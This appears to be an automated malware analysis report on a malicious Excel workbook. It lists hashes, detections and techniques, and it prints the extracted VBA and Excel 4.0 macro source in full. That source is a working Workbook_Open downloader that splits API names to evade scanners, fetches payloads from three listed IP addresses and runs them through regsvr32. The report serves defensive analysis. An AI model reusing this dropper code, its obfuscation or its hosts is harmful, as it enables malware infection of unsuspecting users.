Office (OOXML) malware analysis — malicious · 998efa8df5e3c03e

MALICIOUS

Office (OOXML)

100.3 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-11-25

MD5: 754a44d18a0e85ec6cd11856bccb9820 SHA-1: 44fc12e086af0a18b2a5bcbb15954a4cf605c2f3 SHA-256: 998efa8df5e3c03e92929319ef3e6703c28d519d0d3eb734d960e76a93ed5cc4

310 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a Workbook_Open VBA macro that attempts to download and execute a payload using the reassembled API call URLDownloadToFile. The macro also constructs commands to execute 'regsvr32' with obfuscated arguments, likely to run the downloaded payload. The presence of Excel 4.0 macro sheets and the use of obfuscation techniques further indicate malicious intent.

Heuristics 8

ClamAV: Xls.Downloader.Docusign112101-9908076-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Docusign112101-9908076-0
Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://190.14.37.9/ In document text (OOXML body / shared strings)
- http://51.89.115.123/In document text (OOXML body / shared strings)
- http://185.123.53.132/In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2753 bytes
SHA-256: `172f7370c8fcb432a49217e9c43e715fb65b41c22aa7a88b16448d2057383e1a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() On Error Resume Next Application.ScreenUpdating = False Dim RNum As Double RNum = Rnd Sheets("Mipopla").Range("K18") = "." & "d" & "a" & "t" Sheets("Mipopla").Range("K19") = "." & "d" & "a" & "t2" Sheets("Mipopla").Range("H35") = "=" & "HA" & "L" & "T(" & ")" Sheets("Mipopla").Range("I10") = "UR" & "LD" & "ow" & "n" & "lo" & "ad" & "To" & "Fi" & "le" & "A" Sheets("Mipopla").Range("I12") = "Loster" Sheets("Mipopla").Range("G10") = "..\Popol.gors" Sheets("Mipopla").Range("G11") = "..\Popol.gors" & "1" Sheets("Mipopla").Range("G12") = "..\Popol.gors" & "2" Sheets("Mipopla").Range("G13") = "..\Popol.ocx" & "3" Sheets("Mipopla").Range("G14") = "..\Popol.ocx" & "4" Sheets("Mipopla").Range("G15") = "..\Popol.ocx" & "5" Sheets("Mipopla").Range("I17") = "regsvr32 -silent ..\Popol.gors" Sheets("Mipopla").Range("I18") = "regsvr32 -silent ..\Popol.gors" & "1" Sheets("Mipopla").Range("I19") = "regsvr32 -silent ..\Popol.gors" & "2" Sheets("Mipopla").Range("I20") = "regsvr32.exe -e -n -i:" & RNum & " ..\Popol.ocx" & "3" Sheets("Mipopla").Range("I21") = "regsvr32.exe -e -n -i:" & RNum & " ..\Popol.ocx" & "4" Sheets("Mipopla").Range("I22") = "regsvr32.exe -e -n -i:" & RNum & " ..\Popol.ocx" & "5" Sheets("Mipopla").Range("H10") = "=Loster(0,H24&K17&K18,G10,0,0)" Sheets("Mipopla").Range("H11") = "=Loster(0,H25&K17&K18,G11,0,0)" Sheets("Mipopla").Range("H12") = "=Loster(0,H26&K17&K18,G12,0,0)" Sheets("Mipopla").Range("H13") = "=Loster(0,H27&K17&K19,G13,0,0)" Sheets("Mipopla").Range("H14") = "=Loster(0,H28&K17&K19,G14,0,0)" Sheets("Mipopla").Range("H15") = "=Loster(0,H29&K17&K19,G15,0,0)" Sheets("Mipopla").Range("H9") = "=" & "REGISTER" & "(I9,I10,I11,I12,,1,9)" Sheets("Mipopla").Range("H17") = "=" & "EXEC" & "(I17)" Sheets("Mipopla").Range("H18") = "=" & "EXEC" & "(I18)" Sheets("Mipopla").Range("H19") = "=" & "EXEC" & "(I19)" Sheets("Mipopla").Range("H20") = "=" & "EXEC" & "(I20)" Sheets("Mipopla").Range("H21") = "=" & "EXEC" & "(I21)" Sheets("Mipopla").Range("H22") = "=" & "EXEC" & "(I22)" Application.Run Sheets("Mipopla").Range("H1") End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	12800 bytes
SHA-256: `c881db5a059c142f453ebcc0d4d8849519f20cee6d7a13ba47f1d7d8791f5d9c`
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml	2902 bytes
SHA-256: `b8bb26d25a43536d60b18189ba98cdb10cd5288a407cf4ee4b20e0b86bff9999`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0100-000000000000}"><dimension ref="H9:K29"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="9" spans="9:9" x14ac:dyDescent="0.25"><c r="I9" s="2" t="s"><v>0</v></c></row><row r="11" spans="9:9" x14ac:dyDescent="0.25"><c r="I11" s="2" t="s"><v>1</v></c></row><row r="17" spans="8:11" x14ac:dyDescent="0.25"><c r="K17" s="2"><f>NOW()</f><v>44508.557876273146</v></c></row><row r="24" spans="8:11" x14ac:dyDescent="0.25"><c r="H24" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"190"&"."&"14"&"."&"37"&"."&"9/"</f><v>http://190.14.37.9/</v></c></row><row r="25" spans="8:11" x14ac:dyDescent="0.25"><c r="H25" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"51"&"."&"89"&"."&"115"&"."&"123/"</f><v>http://51.89.115.123/</v></c></row><row r="26" spans="8:11" x14ac:dyDescent="0.25"><c r="H26" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"185"&"."&"123"&"."&"53"&"."&"132/"</f><v>http://185.123.53.132/</v></c></row><row r="27" spans="8:11" x14ac:dyDescent="0.25"><c r="H27" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"190"&"."&"14"&"."&"37"&"."&"9/"</f><v>http://190.14.37.9/</v></c></row><row r="28" spans="8:11" x14ac:dyDescent="0.25"><c r="H28" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"51"&"."&"89"&"."&"115"&"."&"123/"</f><v>http://51.89.115.123/</v></c></row><row r="29" spans="8:11" x14ac:dyDescent="0.25"><c r="H29" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"185"&"."&"123"&"."&"53"&"."&"132/"</f><v>http://185.123.53.132/</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.